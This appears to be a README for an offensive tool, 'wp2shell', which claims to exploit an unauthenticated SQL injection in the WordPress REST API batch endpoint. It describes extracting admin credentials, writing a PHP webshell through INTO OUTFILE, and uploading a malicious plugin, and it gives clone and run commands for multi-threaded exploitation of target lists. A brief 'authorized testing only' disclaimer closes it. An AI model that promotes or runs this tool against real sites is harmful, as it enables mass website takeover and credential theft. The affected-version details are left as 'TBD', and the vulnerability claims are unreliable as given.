Full discovery and exploitation tool for WordPress REST API Batch endpoint vulnerability.
This tool exploits a critical SQL injection vulnerability in the WordPress REST API /wp-json/batch/v1 endpoint, allowing unauthenticated attackers to execute arbitrary SQL queries and achieve Remote Code Execution (RCE) on vulnerable WordPress installations.
- Time-based blind SQL injection detection - Accurately identifies vulnerable targets using configurable sleep delays
- Automatic method discovery - Tests POST, PUT, PATCH, and DELETE methods to find the working payload format
- Full exploitation pipeline - Extracts admin credentials via UNION-based injection
- Dual RCE paths:
- INTO OUTFILE - Writes webshell directly to filesystem when MySQL FILE privilege is enabled
- Admin plugin upload - Falls back to authenticated plugin upload when file write is restricted
- Parallel scanning - Multi-threaded architecture for fast target enumeration
- Rich reporting - Generates detailed JSON and HTML reports with extracted credentials
Vulnerability: CVE-2026-63030 / CVE-2026-60137
Vector: WordPress REST API Batch endpoint (/wp-json/batch/v1) SQL Injection
Impact: Unauthenticated RCE
Affected Versions: WordPress 6.4.x and earlier (specific versions TBD)
- Discovery - Time-based blind SQL injection detection using
SLEEP()payloads - Column detection - Determines table structure via
ORDER BYprobing - Data extraction - UNION-based injection to extract:
- Database name
- Table names
- Admin credentials (username + password hash)
- Shell injection - Writes PHP webshell via
INTO OUTFILE(when allowed) - Fallback - Authenticated plugin upload via admin panel (if credentials extracted)
# Clone the repository
git clone https://github.com/NULL200OK/wp2shell.git
cd wp2shell
# Install dependencies
pip install requests beautifulsoup4
# Create targets file
echo "https://target.com" > targets.txt
# Run discovery
python wp2shell.py targets.txt --scan --verbose
# Full exploitation
python wp2shell.py targets.txt --exploit --verbose# Scan single target with verbose output
python wp2shell.py targets.txt --exploit --verbose
# Custom sleep time for slow servers
python wp2shell.py targets.txt --exploit --sleep 20 --verbose
# Multi-threaded scanning (20 threads)
python wp2shell.py targets.txt --exploit --threads 20 --verbose
# Skip shell writes (extract credentials only)
python wp2shell.py targets.txt --exploit --no-shell --verbose
# Force specific HTTP method
python wp2shell.py targets.txt --exploit --method POST --verbose1- JSON report: Structured data with vulnerability status and extracted credentials
2- HTML report: Beautiful, color-coded visualization with clickable shell URLs
This tool is for educational and authorized testing purposes only. Use only on systems you own or have explicit permission to test. The author assumes no responsibility for misuse.